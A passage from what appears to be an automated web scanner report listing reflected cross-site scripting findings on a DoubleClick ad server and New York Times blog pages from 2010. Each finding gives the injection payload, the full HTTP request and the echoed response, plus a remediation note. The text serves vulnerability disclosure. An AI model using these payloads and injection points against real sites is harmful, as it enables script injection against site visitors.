/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55441"-alert(1)-"1ff26f2efc9 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
|
3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ddd'-alert(1)-'49ddae20877 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582d2"-alert(1)-"b947319b053 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFoun ...[SNIP]...
|
3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e573'-alert(1)-'e1385978014 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88f77"-alert(1)-"167dad5fe8 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6747
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
|
3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12262'-alert(1)-'e4bd8929211 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5 ...[SNIP]...
|
3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a865b"-alert(1)-"c0215a18d89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5 ...[SNIP]...
|
3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f6d'-alert(1)-'682c6ac4a6b was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5739.NYTimes.com/B4990972.8;click=d0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 489 Cache-Control: no-cache Pragma: no-cache Date: Sat, 13 Nov 2010 01:48:43 GMT Expires: Sat, 13 Nov 2010 01:48:43 GMT
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/f7/%2a/i;44306;0-0;0;56070716;1-468/60;0/0/0;;~sscs=%3fd0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0 ...[SNIP]...
|
3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/2010/11/11/anatomy-of-a-scene-unstoppable/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dfc"><script>alert(1)</script>7dc7045992c was submitted in the src parameter. This input was echoed as 51dfc\"><script>alert(1)</script>7dc7045992c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/anatomy-of-a-scene-unstoppable/?src=dayp51dfc"><script>alert(1)</script>7dc7045992c HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.nytimes.com/
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:51:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;chris-pine;denzel-washington;movies;tony-scott;unstoppable&src=dayp51dfc\"><script>alert(1)</script>7dc7045992c"> ...[SNIP]...
|
3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c201f"><script>alert(1)</script>e276354bf82 was submitted in the src parameter. This input was echoed as c201f\"><script>alert(1)</script>e276354bf82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?src=twrc201f"><script>alert(1)</script>e276354bf82 HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.nytimes.com/timeswire/index.html?src=hp1-0-R
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:48:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Now4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;featured;hip-hop;kanye-west;matt-lauer;music;television;today&src=twrc201f\"><script>alert(1)</script>e276354bf82"> ...[SNIP]...
|
3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/2010/11/12/the-week-in-culture-pictures-nov-12/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521ab"><script>alert(1)</script>70bd4e176f0 was submitted in the src parameter. This input was echoed as 521ab\"><script>alert(1)</script>70bd4e176f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-week-in-culture-pictures-nov-12/?src=twr521ab"><script>alert(1)</script>70bd4e176f0 HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:48:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 69357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;arts-general;week-in-culture-pictures&src=twr521ab\"><script>alert(1)</script>70bd4e176f0"> ...[SNIP]...
|
3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/art-design/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9f6"><script>alert(1)</script>58f86990e4f was submitted in the REST URL parameter 2. This input was echoed as 1e9f6\"><script>alert(1)</script>58f86990e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/art-design1e9f6"><script>alert(1)</script>58f86990e4f/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/art-design1e9f6\"><script>alert(1)</script>58f86990e4f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/arts-general/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70f0"><script>alert(1)</script>c5a9dd137e4 was submitted in the REST URL parameter 2. This input was echoed as f70f0\"><script>alert(1)</script>c5a9dd137e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/arts-generalf70f0"><script>alert(1)</script>c5a9dd137e4/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
